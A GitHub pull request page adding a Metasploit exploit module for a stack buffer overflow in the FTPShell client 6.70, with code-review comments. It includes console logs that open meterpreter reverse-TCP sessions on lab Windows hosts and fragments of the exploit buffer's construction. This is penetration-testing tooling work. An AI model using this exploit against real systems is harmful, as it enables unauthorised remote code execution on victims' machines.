Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow #10213

Merged
merged 6 commits into from Jun 29, 2018
Merged

FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow #10213

merged 6 commits into from Jun 29, 2018

Conversation

DanielRTeixeira
Copy link
Contributor

@DanielRTeixeira DanielRTeixeira commented Jun 27, 2018
edited by wchen-r7

This PR adds a module to exploit a remote buffer overflow in the FTPShell client 6.70.

Tested on: Windows 7 Enterprise SP1 x64

Verification

List the steps needed to make sure this thing works

  • Install the application
  • Start msfconsole
  • use exploit/windows/ftp/labf_nfsaxe
  • Set the payload
  • Exploit
  • Connect to the FTP server using the FTP client
  • Get a session

Example

msf > use exploit/windows/ftp/ftpshell_cli_bof 
msf exploit(windows/ftp/ftpshell_cli_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/ftp/ftpshell_cli_bof) > set LHOST 172.16.106.129 
LHOST => 172.16.106.129
msf exploit(windows/ftp/ftpshell_cli_bof) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.106.129:4444 
[*] Please ask your target(s) to connect to 172.16.106.129:21
[*] Server started.
msf exploit(windows/ftp/ftpshell_cli_bof) > [*] 172.16.106.128 - connected.
[*] 172.16.106.128 - Response: Sending 220 Welcome
[*] 172.16.106.128 - Request: USER anonymous
[*] 172.16.106.128 - Response: sending 331 OK
[*] 172.16.106.128 - Request: PASS anonymous@anon.com
[*] 172.16.106.128 - Response: Sending 230 OK
[*] 172.16.106.128 - Request: PWD
[*] 172.16.106.128 - Request: Sending the malicious response
[*] Sending stage (179779 bytes) to 172.16.106.128
[*] Meterpreter session 1 opened (172.16.106.129:4444 -> 172.16.106.128:49263) at 2018-06-27 11:19:38 -0400

msf exploit(windows/ftp/ftpshell_cli_bof) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer        : PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >

bcoles
bcoles approved these changes Jun 28, 2018
View reviewed changes
Copy link
Contributor

@bcoles bcoles left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

LGTM. Minor comments.

modules/exploits/windows/ftp/ftpshell_cli_bof.rb Outdated

sploit = "220 \""
sploit << payload.encoded
sploit << "\x20"*(400-payload.encoded.length)
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I believe you can use payload_space from Msf::Module::Target here, rather than hardcoding 400.

Also, some white space between operators makes this a little easier to read.

sploit << "\x20" * (payload_space - payload.encoded.length)

modules/exploits/windows/ftp/ftpshell_cli_bof.rb Outdated

register_options(
[
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ])
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Single quotes are preferred when string interpolation isn't required.

Also, my personal preference is to format register_options as follows when there's only one option with a short description.

    register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ]

or:

    register_options [
      OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ])
    ]

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Fixed the register_options.

modules/exploits/windows/ftp/ftpshell_cli_bof.rb Outdated
'Author' =>
[
'r4wd3r', # Original exploit author
'Daniel Teixeira <danieljcrteixeira[at]gmail.com>' # MSF module author
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It looks like you're mentioned in about a dozen modules, and usually without an associated email address.

If you like, we can add your name to the .mailmap file. That way your email will be auto-populated in the documentation and when viewing the module info within msfconsole. Up to you.

# grep -rni 'Daniel Teixeira' modules/
modules/exploits/multi/http/oscommerce_installer_unauth_code_exec.rb:22:        'Daniel Teixeira'      # MSF module author
modules/exploits/windows/browser/exodus.rb:27:          'Daniel Teixeira' # MSF module author
modules/exploits/windows/ftp/ayukov_nftp.rb:23:          'Daniel Teixeira',  # MSF module author
modules/exploits/windows/ftp/labf_nfsaxe.rb:23:          'Daniel Teixeira'  # MSF module author
modules/exploits/windows/http/dupscts_bof.rb:27:          'Daniel Teixeira'  # Metasploit module
modules/exploits/windows/http/vxsrchs_bof.rb:26:          'Daniel Teixeira'
modules/exploits/windows/http/syncbreeze_bof.rb:26:          'Daniel Teixeira',
modules/exploits/windows/http/disksorter_bof.rb:26:          'Daniel Teixeira'
modules/exploits/windows/fileformat/syncbreeze_xml.rb:22:          'Daniel Teixeira'
modules/exploits/windows/fileformat/dupscout_xml.rb:22:          'Daniel Teixeira'
modules/exploits/windows/misc/cloudme_sync.rb:24:          'Daniel Teixeira' # MSF module author
modules/exploits/windows/misc/disk_savvy_adm.rb:24:          'Daniel Teixeira'
modules/auxiliary/dos/http/slowloris.py:24:        'Daniel Teixeira',  # Metasploit module (Ruby)

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thank you, I would appreciate that if you could.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

#10222

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thank you

modules/exploits/windows/ftp/ftpshell_cli_bof.rb Outdated
super(update_info(info,
'Name' => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise edition) allowing remote
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Line wrap at ~80 columns is preferred, but not required. In this instance it would make sense, as the following line contains only two words.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Done, thanks.

modules/exploits/windows/ftp/ftpshell_cli_bof.rb Outdated
res = client.get_once.to_s.strip
print_status("#{client.peerhost} - Request: #{res}")

sploit = "220 \""
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

No need to use double quotes and escaping here.

    sploit = '220 "'

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Done.

bcoles
bcoles reviewed Jun 28, 2018
View reviewed changes
modules/exploits/windows/ftp/ftpshell_cli_bof.rb Outdated
'SRVHOST' => '0.0.0.0',
'EXITFUNC' => 'thread'
},
'DisclosureDate' => 'May 15 2017',
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is this 2017 disclosure date accurate? The CVE listed in References is from 2018.

A quick grep reveals this might be a result of forgotten copypasta from another FTP module:

# grep -rn "'May 15 2017'" modules/exploits/
modules/exploits/windows/ftp/labf_nfsaxe.rb:45:      'DisclosureDate' => 'May 15 2017',
[...]

However, it appears there was a previous similar bug reported in FTPShell with CVE (2017-6465) dated March 9th 2017, with an exploit published on EDB on March 4th 2017.

If these are applicable, please add refs:

  • BID: 96570
  • EDB: 41511
  • CVE: 2017-6465

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I'm sorry, I've fixed the disclosure date to March 4 2017

bcoles
bcoles reviewed Jun 29, 2018
View reviewed changes
modules/exploits/windows/ftp/ftpshell_cli_bof.rb Outdated
sploit << payload.encoded
sploit << '\x20' * (payload_space - payload.encoded.length)
sploit << target.ret
sploit << '" is current directory\r\n'
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It looks like you were a little overzealous in replacing " with '.

Double quotes are needed for escaping, such as hex and CRLF.

    sploit = '220 "'
    sploit << payload.encoded
    sploit << "\x20" * (payload_space - payload.encoded.length)
    sploit << target.ret
    sploit << "\" is current directory\r\n"

modules/exploits/windows/ftp/ftpshell_cli_bof.rb Outdated
end

def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

.nil? is preffered

@bcoles
Copy link
Contributor

bcoles commented Jun 29, 2018

I think the include Msf::Exploit::Remote::Egghunter mixin can be removed as it's not used.

If you fix the issues outlined above (double quotes, mixin, .nil?) then I'll proceed with merge.

msf5 exploit(windows/ftp/ftpshell_cli_bof) > rexploit 
[*] Stopping existing job...

[*] Server stopped.
[*] Reloading module...
[*] Exploit running as background job 10.

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Please ask your target(s) to connect to 172.16.191.188:21
[*] Server started.
msf5 exploit(windows/ftp/ftpshell_cli_bof) > [*] 172.16.191.153 - connected.
[*] 172.16.191.153 - Response: Sending 220 Welcome
[*] 172.16.191.153 - Request: USER anonymous
[*] 172.16.191.153 - Response: sending 331 OK
[*] 172.16.191.153 - Request: PASS anonymous@anon.com
[*] 172.16.191.153 - Response: Sending 230 OK
[*] 172.16.191.153 - Request: PWD
[*] 172.16.191.153 - Request: Sending the malicious response
[*] Sending stage (179779 bytes) to 172.16.191.153

msf5 exploit(windows/ftp/ftpshell_cli_bof) > sessions

Active sessions
===============

  Id  Name  Type                     Information                             Connection
  --  ----  ----                     -----------                             ----------
  1         meterpreter x86/windows  WIN-SGBSD5TQUTQ\user @ WIN-SGBSD5TQUTQ  172.16.191.188:4444 -> 172.16.191.153:49479 (172.16.191.153)

msf5 exploit(windows/ftp/ftpshell_cli_bof) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-SGBSD5TQUTQ\user
meterpreter >

I ran into a couple of issues. Seems the exploit is not 100% reliable, which is ok for NormalRanking. I tried playing around with the number of tabs open, and the tab names, but this wasn't conclusive.

ftp-shell

@bcoles bcoles self-assigned this Jun 29, 2018
@DanielRTeixeira
Copy link
Contributor Author

All done, hopefully this will address all the issues. Thank you for all the help.

@bcoles
Copy link
Contributor

bcoles commented Jun 29, 2018

LGTM

msf5 exploit(windows/ftp/ftpshell_cli_bof) > 
[*] 172.16.191.153 - Response: Sending 220 Welcome
[*] 172.16.191.153 - Request: USER anonymous
[*] 172.16.191.153 - Response: sending 331 OK
[*] 172.16.191.153 - Request: PASS anonymous@anon.com
[*] 172.16.191.153 - Response: Sending 230 OK
[*] 172.16.191.153 - Request: PWD
[*] 172.16.191.153 - Request: Sending the malicious response
[*] Sending stage (179779 bytes) to 172.16.191.153

msf5 exploit(windows/ftp/ftpshell_cli_bof) > sessions -i 

Active sessions
===============

  Id  Name  Type                     Information                             Connection
  --  ----  ----                     -----------                             ----------
  1         meterpreter x86/windows  WIN-SGBSD5TQUTQ\user @ WIN-SGBSD5TQUTQ  172.16.191.188:4444 -> 172.16.191.153:49503 (172.16.191.153)

msf5 exploit(windows/ftp/ftpshell_cli_bof) > sessions -i 1 
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-SGBSD5TQUTQ\user
meterpreter > sysinfo
Computer        : WIN-SGBSD5TQUTQ
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > getsystem

@bcoles bcoles merged commit 1e148a8 into rapid7:master Jun 29, 2018
bcoles added a commit that referenced this pull request Jun 29, 2018
@bcoles
Land #10213, Add FTPShell client 6.70 Stack Buffer Overflow exploit
c508a5f
msjenkins-r7 pushed a commit that referenced this pull request Jun 29, 2018
@bcoles @msjenkins-r7
Land #10213, Add FTPShell client 6.70 Stack Buffer Overflow exploit
9bed9f0
@bcoles
Copy link
Contributor

bcoles commented Jun 29, 2018

Release Notes

The exploit/windows/ftp/ftpshell_cli_bof module has been added to the framework. It exploits a stack-based buffer overflow vulnerability in FTPShell client 6.70 (Enterprise edition) on Windows systems.

@r4wd3r
Copy link
Contributor

r4wd3r commented Jul 3, 2018

Nice job @DanielRTeixeira. Thanks for the credit on this one ;)

@ghost
Copy link

ghost commented Dec 28, 2018

Hello, the success rate of this vulnerability is not 100%, is there any solution?

@ghost ghost mentioned this pull request Dec 28, 2018
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bcoles bcoles bcoles approved these changes

Assignees

@bcoles bcoles

Labels
docs module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@DanielRTeixeira @bcoles @r4wd3r